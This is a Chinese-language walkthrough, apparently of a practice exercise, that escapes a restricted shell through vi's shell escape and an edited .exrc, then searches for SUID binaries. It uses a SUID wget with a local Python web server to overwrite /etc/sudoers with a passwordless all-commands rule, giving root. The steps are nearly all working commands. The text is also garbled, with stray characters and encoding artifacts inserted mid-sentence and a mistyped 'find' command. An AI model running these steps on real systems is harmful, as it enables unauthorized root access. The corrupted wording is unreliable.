(命令受限)查看系統(tǒng)環(huán)境汞幢,找到bin目錄
echo $PATH
進入bin目錄
cd <bin目錄路徑>
ls
cd ..
ls -la
查看路徑下的文件信息
嘗試將/bin路徑加入到系統(tǒng)環(huán)境中,PATH變量當前用戶只用讀權(quán)限
PATH=/bin
當前bash無權(quán)限修改環(huán)境變量
想辦法運行/bin/目錄下的bash得到修改PATH環(huán)境變量的權(quán)限
利用vi / vim感嘆號來執(zhí)行外部shell命令
vi
<esc>:! /bin/bash
發(fā)現(xiàn)shell命令返回碼不為0,命令執(zhí)行失敗
嘗試切換當前shell為/bin/bash
查看.exrc文件(.exrc是vi的配置文件仆嗦,相當于.vimrc是vim的配置文件)
查看.exrc文件內(nèi)容
修改shell變量使其生效
vi .exrc
修改內(nèi)容shell=/bin/bash
保存退出
再次利用vi 感嘆號執(zhí)行外部shell命令更改當前shell為/bin/bash
vi
<esc>:! /bin/bash
whoami 或其他命令也可以
whoami無法執(zhí)行再来,但確認了shell為bash
改變PATH環(huán)境變量晨缴,添加/bin到環(huán)境變量中
查看/bin支持的命令
搜索具有Suid權(quán)限的文件
fine / -type f -perm -04000 -ls 2>/dev/null
-type 指定搜索的文件類型绎巨,這里 f 代表 file
-perm -04000 搜索出有Suid權(quán)限的文件
https://blog.csdn.net/u011616400/article/details/41212767
-ls 對輸出使用長格式顯示
2>/dev/null 將標準錯誤輸出到/dev/null中
看到wget心生一計
在有寫權(quán)限的地方(這里寫在/tmp目錄下)新建一個sudoers文件
cd /tmp
vi sudoers
# /tmp/sudoers student為用戶名自行取代
student ALL=NOPASSWD:ALL
# :wq!
在當前目錄下用python在8080端口啟動一個http服務(wù)
一下命令均可實現(xiàn)
python -m SimpleHTTPServer 8080 &
python3 -m http.server 8080 &
使用wget命令將sudoers文件寫到/etc目錄下
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
執(zhí)行sudo -l 顯示當前用戶有哪些權(quán)限
sudo -l
當前用戶獲得最高權(quán)限
